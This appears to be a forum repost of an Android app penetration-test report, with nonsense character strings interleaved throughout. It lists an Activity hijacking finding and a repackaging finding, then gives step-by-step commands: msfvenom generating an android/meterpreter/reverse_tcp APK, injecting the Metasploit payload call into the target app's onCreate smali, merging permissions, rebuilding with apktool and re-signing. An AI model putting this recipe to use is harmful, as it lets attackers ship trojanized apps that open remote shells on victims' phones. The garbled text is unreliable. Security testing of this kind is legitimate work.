原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

h D" x8 w" o 7 [! W8 P5 O% K7 w$ d) t
# v1 ?6 L7 f3 W& l( K ( P9 ?0 C- Q; j. u* S' E1 Y

& C6 l0 e1 x) k; \ 2 b, ^* _5 _1 }! J! K 文档编号： $ [) J$ U9 n q) H$ l" c. ]8 y" p _4 ^: Y% W& a) q

1 o6 c! C" [" }" s - p3 n7 y+ s2 ^6 s- ^0 c 6 H. }% V& n0 v' o% R4 Y% a " n; f' E/ u* c6 F! `$ i

3 [$ _+ ~0 h! L5 u" F& m 5 f5 q6 _. O) X @- Z5 n ) I$ u) F% A2 v$ g) K: V # h5 Q* K3 I' p9 N; ]. C6 C

: b( g; k* j+ ]* y+ B7 a. Y+ ?3 l- ?0 G6 ~ N ; B- l% L- `' N6 q , K- w/ v' U* f8 ~( B' h! E

9 t6 N+ H/ ~! H& ^# ? ! y( i$ I" b3 L: B, W P1 k) t* p, b, b& r: c5 c ! R, y9 A& H% i8 e

6 c6 Y( C; R7 } ( Y) _1 N0 ^7 i8 g8 _ 3 U' a- [6 u' w; t+ e8 A 7 h. H# u- Z+ Z" i2 j

5 u: W7 A( ^( n0 h" o ) d. D h% d/ R1 G- ]$ R: F 某某某APP渗透测试 6 L3 @0 y0 l' T; s- T - L0 w& t6 J# J4 T/ m( \. P

: r; R( K g0 ]7 P4 G: T) W$ j3 ]# h, T5 V& V9 J, |% X ; ]2 [. ]( k& t1 z2 E 6 W" @6 C! G' h9 p( _0 w

# ~! c1 T8 K& q) p, N " X; Z& p# K+ U9 R/ C* ^, L1 L 5 H9 v5 a( W- u |0 i. a5 e) h9 Y1 D+ j1 r( l* ?3 ]: p5 ^/ `

S- ~/ B# O! w9 |4 t% s B; R . V3 i% @( x) z' T9 P3 j/ u1 I ; A0 X, p/ Y& Q2 a5 {5 n5 Z# y9 _2 I; }2 | F! L

7 V, x0 B7 f5 N$ z7 m* Z3 ^3 P3 L) |0 [6 I' r; s% }# i * J1 P- Q: g% J$ f$ w( T( N $ N! X$ M8 ]: w2 H: q; B& F

& v# A t4 u1 V5 Q 0 a& l1 L$ H$ O+ f; Y0 H: |8 D 技术报告 : n8 T. K' B# [ / i/ m( r- J1 \7 D. d* ]' l

/ Y$ [! n$ p8 Y5 R' \6 r - w7 b! V! c: ]" \+ J; [ " n- e3 U: q/ K' l* l % `) a8 J5 e- ^' q& F! U

7 ]. D: ~0 V* i' p1 k/ E- d, I3 @( ~! [& E 2 ?) \ S8 |4 s! O+ R C! Q5 W$ R5 X# q7 }& M) Z

' j) {3 N& Q. U- b" v % s O( j5 q i" w: B/ _( r; d $ V6 P. i# q6 Z1 m % t4 N$ n# E* g# Z- P

# r2 E+ g( W6 s9 ^5 g9 s2 N7 b9 \2 f/ n$ O. U" a5 @* H 0 Z3 K. o& L8 {; {: N' L 5 Q8 T2 `& V6 q' i8 l- Q

( w: H# t! H7 H' D $ W+ ^! W& s1 G $ k* L8 a7 F3 t/ h$ r# q& x$ n * w' O8 f, G v! D: b! Y

3 `9 p' X& g; S M3 J$ { ]3 n/ D; I, I! o- |+ Q% B2 N" A0 b / Y! P& ^, v4 L2 B" e" h! G$ X2 S" S1 c8 B0 L% O1 }3 i5 p

5 n, k- {. k0 S) ?( G+ i0 [ ) h/ H5 X. V6 a! N 7 x, u7 |# _ s9 a2 [' X 1 _* X0 e, _9 \" e6 x1 j! X

9 C+ T9 o6 B8 c5 ^! S) h& w m; L& f$ C0 L 0 N/ u' {& Z* e( } % l% T4 F! t+ p/ ?

! _* o- n+ E. c* I2 {4 }9 f 2 Y7 X ]7 I. w- s/ M: G* y ; \5 D& G: Y M. _7 [ ! H5 A% U5 k& Q/ J* c, w

, p8 z" G. G7 p% ^3 m6 }+ W ( C5 ?; s" q- E' j; _4 o7 W * W" Z4 s7 J7 a. v2 L7 ]- E , L! o8 }+ u& \/ E- r {. d

% e4 k- c( \% X$ K8 r- t4 R ( c+ v1 @) Y1 R) n& s; a0 ? J+ P3 K. [- M * Y0 W: A1 V& o* ^# d. W

3 N E# T' e5 v/ K6 j. G' X " |6 v c* H4 p) i9 S7 B+ t . C6 f4 a7 M. }& h " V* x7 N5 c* Q) m- M. \

" W. j5 J- c4 w5 \9 Q ! V- n0 h, }9 B% | 2 N/ G! r: ~7 P3 d9 S0 o - f/ ?' l3 F) s4 @# R3 R

2 G7 D: ?2 y7 O/ r W! t# |; ^# B) R% L" t: X! Y0 \4 Q4 j) z - M: h+ }/ q; t9 ]# y, p1 L 1 N. T4 O1 S, `/ B% ]/ A4 n

: ^: A, Z7 p+ ^" ` 4 ~. G3 ^9 g4 ?2 H" n / s- w; F* z `3 `. ^7 O9 @7 S1 v4 w3 w% M6 C( P% |+ v

5 C% X* R9 z( t3 \; _ . f* E2 n4 q6 P9 {: F/ v - w" e, Q6 B6 H. q/ I; z , s6 B0 l' }) l; Y& D7 D

0 R3 T( I7 Z. }" s" W, p+ D1 b9 C2 }/ \9 l0 O5 x 7 K, I6 [' X9 p8 S% `7 F6 f" i4 P7 {* C

% j: y$ r0 T: E' N1 E) d $ h* `/ O% l- ~* B% ]; d5 p+ V x, [ 1 i% Y% y2 K6 R \" h! B" `7 D' W4 T5 \, d$ c

. H) Z& b6 n3 ?. ?- o5 O+ s ( f( Y+ H, N$ k8 J1 s5 `5 G/ w 二〇二〇年 / `, x( r, ^/ |) L8 j9 M) o$ }3 f Q- S

' }. W: y2 |- L* d6 v % u5 n1 U( Z' ~ R2 m$ o! T& J% r 目录 3 o) N, J: Z* Z$ {9 f$ T ; @) v, K9 j# u* ~

; u1 M {& A8 b * X% ^6 {/ b. V8 F+ `/ u; M 3 D9 A0 p) Z1 _3 }& n # s4 q! A6 W! W! G! d9 n

/ Q' Y0 A9 u0 ~: Z # |6 A! o% Z) Y, W7 L9 @# l \ 1 概述... 3 , a% U4 F- j/ W: e; V; r. j- W 1 L b& J7 Y0 h9 M& x& p! d

" e- I, `$ ?( u& u# e ; C; k4 h M, t 1.2测试时间... 3 - L8 T9 L) g0 w3 d2 E" F " Y `7 G( \8 a& R: k! |

\/ v( e5 S) t* [: ? * F# m$ q# w# z! o- A. i 1.3测试对象... 3 . }+ f' \3 \8 _5 C3 w- c7 s4 f- P% y8 C. w/ ~' N. ~

; R* F8 H U' ~8 P5 A 9 @" a( E) o0 z6 f5 A! h6 W/ a3 x [ 1.4测试结果... 3 4 V% x% i& G n8 m8 S9 W4 X % n F8 |$ ?2 f& U5 C6 p' y9 o

0 U+ q2 U' U! y% c e' G* J, Q8 K& t 2 检测结果... 4 0 m4 }' D' n6 t. {( m+ T + P. }0 N0 `, B+ a! V

+ R6 f5 z |1 Z# r/ c5 @- |5 z* N; M 2.1 某某某... 4 . Z3 n3 N! ]+ m) V) ~# n % H2 B+ ?7 R* M5 M# h: @

S" g# d5 @8 S9 I( P * V7 C! g* S# ^! K- t4 G" { 2.1.1检测目标... 4 / R$ `* J# l8 i' ?5 h m6 h$ p, j$ P5 v0 Q9 K0 u3 F1 p

: u' [( p1 O3 h% Z" a* r7 ^( X 6 ?6 f4 f9 M' y# a 2.1.2检测结果... 4 , i6 M7 O U. X1 ^# J7 B1 v/ Z ) u0 t: b: }. \6 i

" j+ w) c8 F7 S2 ]) o6 E 3 |6 S; J. ^# I" P1 s 2.1.2.1. 4 ! l) e/ V. [# j$ Y" _* r3 @; A6 j" O) r. V5 c* C3 |

' [- y) Q/ T" N8 q$ \6 {$ [5 V/ S% _+ P0 M5 f, T 2.1.2.2. 6 - E7 x1 A% H8 i; D" c6 m. Z; A( h2 D

2 t1 `/ Y% v; a! k8 l+ r; _* Y' h# G; G3 D) V6 I5 ^+ Z $ c* ]) j v9 y/ m9 Q * N2 ]( C2 D9 x2 [3 d) p

3 M0 k. H* y; X( U- P0 ] 8 e' g9 ?) d9 W 1 概述 3 N7 M) `% r$ E* C: n* {. D 2 k+ A+ {3 w, k' }- Y- j

5 y4 u. v' c* m$ K6 ` 9 i: L( B" H% D1 z$ V 1.2测试时间 5 V2 d7 t+ p8 A1 N 3 Y/ E+ J& s! N/ ?5 a

( ]% W% J5 l( k3 }; K6 Q1 ^ Y& ^* m + c6 o% n+ m9 E$ U6 }/ U; x 3 E$ [! n# _& J& d: v3 u0 \1 g 5 w8 J4 P3 q4 X1 h% `: _ 渗透测试时间 " w" X) {& o; k& s; o ' J9 I" h: ]2 z7 k4 s) i" w" a 5 F7 {9 j) H- @ 3 \|: _( \|- @! @" B" Y( L2 ~) f
. V' j0 l r V! A, @+ n0 H! K( \1 R5 V 2 q# m) y% r$ s , Y \. s- D1 S+ V- B" D 1 ]4 x; t i# V4 i2 @ 起始时间 ( G: m7 h* h+ d2 \6 _; J+ ~9 [, Y# V. @ g5 D# S1 { ) x) a$ R. @2 Z/ V. t3 \|. `0 @( w% h" u5 a7 C* x	& o" r3 \|2 ^1 n; ^3 r ' \# k9 f9 A8 W8 O& g. _ " `" \9 t' r; X . S4 O! @! a6 ?1 e5 ]3 Q 2020年4月6日 9 X* J* u3 m# n7 U! L- B7 c: _# ^1 C$ n( j" s ! a! Z# P1 o- g. Q% ?: C* r- o% Z% X4 O9 l6 q; ?& X' ~
$ M+ i2 p8 ]; O1 \% O* G 8 C8 ^, `4 M( K) T ! L" j9 T# }2 Q' u8 x, t - b3 E2 G/ v) f( `3 n, \| 结束时间 2 S+ q- R* L3 N2 L" g4 s: ~9 k/ Y# B; A% A4 E 3 i2 \- [# r( F) Z# U( i7 y# H( S1 G! E4 \- Q t	2 N7 Y0 d& E0 j; k / Y& @+ Y5 c' b/ i6 h2 q 7 o2 f1 r, I% B: P* G% C/ I4 O " D/ Z+ g7 V! v& y$ u; P 2020年4月9日 6 _6 r1 k4 z( V( e+ `+ p3 ~8 G! g/ V( Q5 B6 c % A5 O8 G" X/ \" G) s8 b 5 m) R! g. L1 _& r7 X9 n' \1 g

* D( E8 ?# u3 Z) h5 q/ H - e6 s# h7 x: }8 l5 S( [7 G 1.3测试对象 : l' n6 G: a. m5 t' y' t3 S/ J1 M( \* h+ x& @: B6 P; c+ }

0 ~' e8 u2 a( C( c4 P t ]% k! w7 i, b 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： ' C; M! i) E4 ?/ G5 ? ; q4 t: n. K+ a& i- ~

9 X0 p( i: o0 a0 ]( l! t: q/ H; j i. F; ]/ h 表1-1 检测对象 2 I1 A. I( B: m/ _ + I1 g7 H) M9 A& N. G; D

( S( Z8 i% q2 O: K7 G& [2 J; \|1 v5 u, k3 c! g) x0 g0 T7 S0 \ ) \|$ _" h/ \* O2 c! `! ?! d+ B% j0 x& G4 j 序号 2 z% g3 w# @) q' t, T : k! W: v. J' b. g# q# l3 u# l 4 o7 b/ Z# \# \|8 S# I9 \|9 N 1 s3 N7 `6 {8 ~5 }) T9 n! e	1 g' M6 [/ T# h# Z$ b( P 9 N! \|5 V4 ^5 V7 B # B& s* r& O3 v* S& J " ], @; }. ^( v# f 测试对象 . L' w6 m/ m3 B. Y: p* x 2 Z9 N8 h; ^& U% w9 E. Q" i+ x$ x q 1 J7 O$ F2 K, }9 A; o # v$ @* C0 K" ]" K6 u% c6 V: O( Q$ E/ e	. Y6 m6 ^8 W7 y 6 G9 Y4 R, l% `+ l ; c4 L @) R e$ \|1 q# L* _$ ^ / b$ L3 B. C/ [- ^ 测试地址 % o- q) U" G" J' S, s5 L1 V & Z3 }, Q' a7 P n' Y1 \| 8 S2 Q3 _+ h* i& e) [ , m: i# S( L/ ~3 q1 K( S, h4 ?	/ D w2 u! U# l0 D' x( Y/ f0 [ p w6 f0 ]2 V % n2 c2 K; I) p" i; ~" g1 x' V. F; N1 Q! b4 K! Y W' } 安全漏洞 $ ~8 B0 ]2 l/ ? _( L7 n6 P! d $ j- p9 V+ W# p: ^. r & B3 o; w, D: \8 P, D: j& U$ L . R6 Q% c8 F7 ^6 ~; g/ d# \
7 H) e8 N1 Z( L9 Y& k & i% o8 F0 d" G9 N8 i( ` ( d. _: {7 t! {( r5 j 9 ~+ D. S6 b0 W, l; x 1 & a6 W0 b4 @# F : \; Z8 _4 Y5 {% T ( U0 u* h; [: ]. W; J9 Q; A" A ( Z, A5 L+ F0 E( q# }: J' H5 O9 R5 w	- O$ ?4 m1 z- e; J0 V$ W! L # u. }. v( E7 P/ G4 g% [ $ R; H6 }* L- b. U9 L ^6 D# c $ S% r" l4 N# D' v# s 某某某安卓APP Z3 i: B0 [& X / Q$ ~/ ?8 t. I1 A/ g6 t ( E: D' ^- G( m' \8 g ' A7 G' O8 T) v! D) E! u. {1 s* F K0 {	& l% E; e4 O2 o 8 \|) q: `0 r$ q h 0 }+ R# k) }" \|, e0 w3 K6 I: X % P& o: {9 Y4 i ! P/ p Q: ~( a+ F# s ( V0 h& i6 h3 Q; a/ d6 K( i$ v , Z# I- \|- b: H' } + F- M+ v$ j! b9 N( b2 P	( Z& _( {+ K% x# r! ~' Y* D% D6 G! I: @7 F- U% ^ 2 S4 f0 c* ~! I: G% i" M ! S; m4 i+ i, W# A r P 2 9 Q$ \|) x0 J# C# { ! }: U$ T, d! V, ^ 2 j" i* X" H8 g8 ~ & ]5 c& V4 _5 g6 c: P

5 Z3 D' V: D9 N2 _+ T 7 t( x5 q+ j5 r% \' `/ Q1 f 1.4测试结果 ) p q- X5 |" f+ T. v8 t+ Q 6 ^& t% c$ ~' n- ~: {# H

! q: e* b8 `6 e, M2 { . N/ P2 W( B' {9 d 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： " ^; t# n& T# l3 P* N9 u2 ] % h" L1 c1 D! A

% e% Z& u+ k9 D- Z+ a8 R7 M$ G' P' x 9 l* S9 e3 t$ Z $ i; i9 H3 T+ H& U9 ^( d , P; `+ [# k' ~6 ?. V; Z0 Z

2 q- D/ V& {. C+ D5 Q+ C1 ^- Z- m ' E$ r* O) S9 G$ j+ \ 序号 5 o& ^; @0 T; ~" ? 0 ]8 n" R% b' U: ?$ @+ R

: ^% i- C7 k }1 i" l% G4 ~! m% X . P5 Q4 ]9 Q. z* T$ }; c 系统名称 / n% }' H3 D" w8 U& E , w% W$ N1 K- _9 V* P

( J/ m3 e$ p; S& J , L0 s7 O9 I' O8 G 漏洞名称 " w4 E* w- P8 f4 q. h8 L 8 M: t2 K! F+ Y% y8 R

& e4 q: {6 r; p 8 @# c) b( g- b6 ] 漏洞危害 4 M, L$ C% c1 n y+ i & k# X- d0 m H0 b. y3 U

$ j$ a3 l3 A( M+ l# L 8 q. g& L) ~& A, S8 b 修复结果 2 i8 I: {, B; S' L) Z Q / k( o9 R" q9 c$ G

) p8 D% Y4 b0 v) G - c1 a) w$ R1 N% w 1 4 r% D# y) o* F6 o5 u$ Z( ^ , {/ Y2 X1 y, h4 p( W1 F, y

: f8 K- ^7 A2 g( [9 g 7 @$ Z# B5 \/ N& M 某某某某某某APP : E$ D! i8 O3 N1 F$ z( x2 y0 L/ g- v0 w! c5 `- j/ I1 ^! p

( {- I1 E+ n7 s; i! d( l6 A, v g- `" C0 p9 ?8 K8 j Activity 劫持 % U I% A# [( x% } $ M4 n$ \! v. h0 s

8 R! r* c! t2 ^- {5 {- f7 | ?+ Y ( L L) C& g6 c* f# D0 T) ^0 v( @ , i2 k" ]' W# W. D 6 b1 r! ?% C) K3 f- R7 t

- J0 S7 ~$ r1 ~+ g u4 m: S 0 c/ O% _+ Z" t& i2 s0 N 高 " O4 ? g3 f3 K( u& K8 e' P% @7 O! S' w$ N

" F ^. Q- ?) D& h" D! U ) v! c6 B9 r, z6 z' H) h ) l3 j: U2 i& y5 S0 I4 f) D3 ~7 L 3 y c) g1 Y; y/ Q

8 D" ~3 o K9 }' ^: g7 a+ n; s % t4 S, d; S+ [7 F 2 5 L- f/ X, t( S7 e& x- z7 p! T$ r ( |5 B& L- i: w. N: |5 ?1 o

% [! ]" @% ~3 ? f1 q / H' G: ^' C) u% V" g 某某某某某某APP ) L' z0 n9 Q' G( f( W T 5 I7 s4 D1 _( v, K- x8 t6 K

. {' o0 I' G' P9 ?8 Z* M2 [ ; V7 ?- ]' N( }6 ^( V# Z 反编译二次打包捆绑木马、篡改APP代码 & P) T1 Z& e- {' F7 G' V ! c3 b) M- B' a4 s0 }

* f; v3 A1 g) k; t$ p/ g/ ]" q " @7 R' \8 ]8 c* g3 ~' A, _ 高 $ [; v O# C8 [. Y0 H3 p. r 9 F7 D& }- j/ r' u: _9 A: n0 [

1 q; d) i" {' L* |8 d$ f ! @9 V) I+ ?& [' ^ ( ^# j6 I3 J& K v3 L% G5 D4 N6 s5 q( m: W- T5 [

- }. t& j" j( i& p* x1 r* b ( \& W9 `( q$ C0 H# v a0 ^ ' |% I! ?; @* z* A( P; F: z4 o% k0 ~* y! R& ?/ N- e# @

' F7 @0 |0 X4 F, Z d f 0 S% g& I5 _9 N4 t) F 表1-2 测试结果 $ ?0 r, j9 W+ R8 F1 E; _6 Q! U2 B 1 |- \( O& A$ d* t4 h& k: ?$ [; b

- c& J d$ M1 k/ e9 T : d7 }; `, E* H# y. ?$ e - R2 Q+ Q: _/ c$ n3 o+ U# | + B, _$ C! N* z3 l M: Z1 L; C

# R* m2 S1 W7 y+ s# E8 F 5 D% b, g0 r8 ^9 `; ] 2 检测结果 ! A% W, z8 K/ k5 I 8 V6 ]/ M; B( U, U" N1 D* T

% b. y3 l- |0 N3 H# @3 h3 p! s/ o( A( z, w: F! p 2.1 某某某 * C, k+ z4 D0 s6 P9 a ' R% \' }1 ^3 n# n0 X2 u, M

, ]1 U5 n0 B" h0 M1 v. g 3 R; Z4 z+ \' `* g. b8 y& g8 e& \ 2.1.1检测目标 # j2 d% ^# d9 k: E) g1 ^( S 0 \8 T, E0 f( ]8 ^; H

0 S$ E2 ^' l7 V4 P$ L) W 7 b0 J6 V( Z' a# D: V E 目标地址： 某某某某某某APP # P* `2 W+ X; M" B5 U5 U 0 `1 v; L, u% ~

6 r' p# h! z/ c9 _1 F # I9 d* M0 @/ }: F5 ~. O 2.1.2检测结果 2 X* A3 W5 z3 d |" I 3 u ~2 h9 n7 X6 P( d2 F2 v

( b8 G8 @; S F* e& ^9 n, y 6 {* H6 z% I' w 2.1.2.1 ' G @* e. \2 r5 B/ K6 H) V / |9 o5 x; ?, p8 i

3 c- l+ X" O0 k' D, @/ g 1 W0 ]7 y6 H4 G) `6 Y1 W% B 漏洞链接地址：某某某某某某APP - \! p1 U$ _: |4 z ) Z% y* L$ f% _0 w8 c8 T

, W D1 I5 w* T' _1 o4 ~( Z: x+ ]+ x( s9 G0 }* ^ 0 K5 `- F! H$ h% W& g * H/ [ s2 i7 B- l+ m' n c

6 ]+ x9 r, d4 p% N7 I! s/ b % @, |; v- w" h! ]* C9 d; { 漏洞分析及取证： + Y! l% @; y- n/ t6 m 0 `; _5 G% h6 ?1 [. ?7 m

( H) M, z7 F6 l% [6 e# f # g' K4 `- Q( v2 p 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： 0 I% a6 ?* y4 A0 C* t0 N0 [! u# W 8 d9 @& k4 ]; V! E; P) }0 O$ V9 ]

8 K" C- A% F7 l/ [" F- h, Y' k' }) A ; o% Y, B# q0 B8 W9 V * ^4 W0 m7 d' d l/ P: Z h: d2 M: G7 R

3 \8 X( I5 p8 @6 J % u) c" O1 H* b( f* _) [ W & w4 X7 g6 p; H4 y ) T9 ~6 w" z# ~# M6 j

8 B) Q0 {1 L1 {9 L ) Y9 p9 c& H/ V* u: B: p $ I/ Y/ l% T' O, r ' t- K; C- v0 n# ~& e7 x1 w

" O( l b! L/ _# p2 _6 H4 s( H" @* d9 P4 e3 x( _ . W9 t% P+ b: D# }3 F' C- m8 ]: f4 {+ P: ]& z, @( L0 ?

" z7 | n: H5 O& p8 q" p9 Q; b) l' L: d0 x# P , l. L: c' w, X q9 s& f( {3 z

/ z" Q9 ~; g2 v: g; n" W ' f' s9 ?3 r) z: y, } J7 s5 v 漏洞危害：高 , E2 R# x( m! p6 Q0 ^; L7 W. t# O$ O& Q/ d* R% [7 Z

& x0 a5 m( e2 T( O5 \|. f% f 5 \|! c+ \- t: t. o0 Z; Q " E! P; T5 A* K! m7 `0 u # p! d- x# b# @0 W- C' j4 J 严重程度 4 e: q, t: V, V5 S1 r5 F$ U8 J; o4 S4 j0 U0 J& M5 B# B - y, [' K7 q3 l * \| B v1 d5 e7 [3 G2 V6 X	, F6 y; ^/ h! }1 [ * l4 A+ }4 O. i9 J! y1 e8 Y . P8 K! {" j6 r, ]7 n* x* o8 R( G- w0 @) {. O- V6 }$ f" ? 高 ( M5 ]! e! L# N7 U/ m ( C; \|* G- w9 h9 r8 F* ` + \" s) q0 w: L# \| v 1 V9 ]* Z' i* W: [; [	1 J- d X- P. {% O " q' V- P9 A& H( n , ] l* y& v# \|: g. W ( n2 X% k% [- ^3 I7 M4 A+ } ■ $ Q6 p8 b* {' k( P* O 0 O5 d* ~, e! Y: s; B ' j) n3 D7 t; C: W+ A7 x3 m2 @9 S8 h $ f, ]2 C Y& N' ?* D	# Q6 f) a! y' F I& } 9 w( V9 \! _" Y N7 \|# ?7 W0 q3 _4 e 4 X: W, d# g3 J8 E# \3 ? 中 7 \|/ k% U4 A1 s* x! o* @+ R* ? & s+ T' F9 P& X f" f8 c" o9 V ; H/ u3 D3 u; f, l+ {9 A9 z3 e1 W/ O4 X ! u( K! e, n. {0 u	* ]3 O/ G2 g i0 n/ g5 N' u8 I ) Q7 v, O/ a' `& I" N! v ' o) e: \4 w1 z1 U) o$ ~7 Z1 ?; P ' W0 X( G# A5 ?- D6 S2 V $ R ~3 \|0 s4 }$ u. p 2 g( ?6 p, ~1 C, w0 {0 u % C$ z0 T3 }4 F+ s- y5 b0 j; k7 P$ j) @4 P1 C e4 U+ m	P/ ^9 h. m, W* e9 Q1 s0 }8 \5 `: e5 T4 F% O \8 B' q3 B " U, k9 g- {0 v& c# g5 p9 ] ! ~! R2 R/ J8 e: t% u 低 4 D* z* @; a; q0 s$ D 7 Z% l% z% R; I! h: x ' \|2 ]/ A% C/ S+ \| 3 J6 N8 @# p* \. U	- ]; ?6 O# L) F; A# o. V9 x$ X# a) { 7 G: i% t3 \" o6 ]5 z& ? 5 y K( {1 B. q D$ b$ p: u" u ; G p5 _# f6 r1 c$ c$ k5 Q2 w/ ^7 @ 8 g+ J, `& I1 v# O+ \|7 }. ? ) F0 Y! }. y; L4 A! h + u; B2 Y& b7 ^9 b) G2 l; d) o7 L

2 e& S1 c0 k: M2 J) r; s , |* Q& Q+ X8 \) ~) A) z- b# m ; q U! s+ g0 W/ u/ ^6 f2 c7 n 5 G1 s( c! S! |: a

% F# D# y: ^3 h / O; S" P2 U( [$ U7 g 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 ( Z. g0 q0 p N0 l/ Q6 X, F( h4 B' n0 x* P9 ]8 l

4 k' E. z, ^0 p# G) N) C) J3 P% D' [0 N* s) E2 {, [ 0 a; y, _: s9 n! R1 U% J # W; x; q3 ?3 l/ t( p4 m

" S" i! E; s- ~9 j 1 l. z3 I+ \. `. ^ 8 H$ x3 c5 L3 z6 B* }. u0 S! h3 g( l1 i3 x% J1 b0 \. b

% O' ^+ ^% S5 l+ Z 8 c1 z) @) G! F$ m. K 2.1.2.2 , `5 ? S. A: W' E2 T 4 F1 a; T5 |6 P

7 z; w$ D5 ^8 q: ^- E: i) t! d6 J) i" z9 p5 I4 p* \; F: z: m" K 漏洞链接地址：某某某某某某APP 7 p4 D/ c6 D% a) H. a/ e9 D' Z* u- J5 l' G( k

2 B* T/ D- J/ ~8 A k2 ]) L( O, [& W) ~" ~& H/ y" G9 w. p3 t 漏洞分析及取证： / r: Y& v3 A, T2 ?0 m7 ~0 [. I 9 ?! L7 V9 O# @! I

# D U' q9 U3 c; C0 F , A% m3 c: Q* P8 \# d, c 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： # R. W+ i' r9 n% b9 s$ ] 0 X" s8 e! a* v% I x

0 a1 Z, o/ Z( a! d- r ! z$ F; a) c9 F2 q/ B 用Metasploit 生成木马 apk 7 g2 r `( H7 l! d$ t C* J$ N 6 @4 w' M, _3 ?5 O% H9 c

4 k& ^7 ^6 k- Z+ T . D* H) F3 B9 U/ V) m4 {5 l msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk * X7 U5 S* b: ?2 s3 e) ? 6 @- r( n7 a8 [+ C! y

3 w& }4 P' z7 B 4 l! ]; g1 L2 p8 u# \7 k 反编译目标apk和木马apk 1 Z1 Y; L n% h9 m& z" j1 ~0 g4 k. E5 @, b# [

( E' x; L3 ?+ w1 A: Z# o/ L$ m. l apktool d target.apk
+ R! Z6 R" `9 ^$ \8 s" H) d( c. R) b# m! l6 L6 p apktool d cockhorse.apk + f- y) Q- T( D) x + H0 F0 _8 n. [. @, r$ g

6 t0 I+ l8 |; g1 x0 M4 C, o% c+ ^- E# `, I7 S 木马 apk 注入目标 apk 1 }$ Q- V6 {1 X ( V' I" ^, c* e; Y

( B6 a# [ c7 y) P v: a) p2 t) a7 B) X2 i1 [* N3 H" X. I 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
T+ A0 J9 W/ I$ S: w4 f : h, T2 C! S; m- C; J6 Z' B% \2 o invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V / s8 p/ ^! y- m1 M$ \+ J 0 a" Z8 E' `5 D- d4 g5 e

' N9 g4 X7 q4 n+ `. A$ j& S0 h8 R7 |: i6 @ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 ; |6 Q/ k. Y5 @* T1 M9 S P- ^& e, O/ {6 G/ J9 l) E! [% r; w0 H

}9 T! [. U6 [5 j. j7 H ( Q" v& f; n8 R8 ?( j 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 x& [+ @9 V) _9 r6 r8 K0 i3 {) O8 K3 Z: L$ j' o& b

, D$ l4 ? {5 o2 U2 U5 a 9 w, W4 X2 \9 ] 回编译生成最终 apk - ]. p, J5 `8 D k8 G$ C* T% w7 N/ W& n

1 h; \$ B. }' y, g# f6 o) C" ^& [ ; U6 _: k9 [9 v; n5 t: k. n 重新打包 7 r3 S2 R* |' k' `! ~6 t: | : A' u3 T. d. L0 O+ o1 o

: [0 p4 T. K6 K* V% Q/ z6 x- y, H. a3 Z: ?- B: L apktool b -o repackage.apk target_app_floder ) S0 f. _" p) A3 v1 A. R3 s- m; f2 @6 {+ q. z4 O+ `

' _2 H: `/ [' v' B% |, N 7 j: x4 ^) k$ R+ ` 创建签名文件，有的话可忽略此步骤 l8 G4 h8 |( J9 h / N* T: C" j& R8 I5 B

+ Z0 e0 H8 L! q) n3 c * p+ i, [9 ]$ i6 v% R# q( ?8 K keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 # k3 f! `: M7 ^# n! x , Y: ^% B s8 r$ O& K' \

4 z* e4 {% V/ w9 ^( F+ X6 [9 D U% @* ?5 L7 w1 B/ ]& y 签名，以下任选其一 6 B1 q' ]- K6 A& a: H6 V4 \ $ F3 S8 R0 V) A( }& h2 ~! O

2 m0 H2 r" U! j! P/ o$ Y # _5 ?& H: w4 | i# S jarsigner 方式 ) D; }3 E" b( p [ " Q+ U2 ~1 n1 b `6 R

% M2 A! `6 [' ?9 C 7 Q( a; m: z& C2 v4 n; x0 ?' R jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname $ {- j6 J( D8 ~1 u9 f4 U * W& y! i+ k( q, t S

! O; h' e9 `; j3 |. ^& I4 g* H! E3 q( s apksigner 方式 5 p+ S$ A$ T9 R, V 7 O1 H: u/ f$ I/ K. O4 I+ A5 w K

5 Q8 |$ l8 `: o" R& A& [: ? * s# N# s. e- T$ t6 z1 w apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 5 r; x+ p, s7 G0 A" A+ I5 J$ v& y# `! P7 c% M9 U4 z

8 @' R) s; t \/ z4 v6 l5 r1 \7 l & ~! W& Q8 e3 Q" X 如需要禁用 v2签名 添加选项--v2-signing-enabled false & i3 u. M3 D" m! Z) W3 I7 N9 n2 i3 \ / i# X3 Y2 c0 D

% d! z' @( L6 d2 q5 l : u$ k: z2 \* y: j& Z4 c9 S 验证，以下任选其一 3 U, O; {$ S4 G' Q& F; ^2 R0 ~$ |; | 2 n! l8 M0 A6 A8 e) r0 e1 D

+ e( r2 o$ R+ m 3 V) \8 V+ m+ H, @( n* L' I( ^: O; d jarsigner方式 ~7 H7 v, b' y2 b6 R3 c3 ]5 w" W: ]- Z9 k0 _8 ?

. o4 A# K5 {' w 1 ^" O7 C0 T4 ]* q/ S" z- m jarsigner -verify repackaged.apk 6 l! i" s& @& m( w5 b: { ! [) z* E+ T9 R

, s/ \' G$ v8 O f% k) K1 ~ 3 f+ D; x. f" v7 r apksigner 方式 9 }8 j) O7 Q7 x( C; @, k 9 @0 k7 O* ?; l1 ?2 t9 ~: z8 s, G

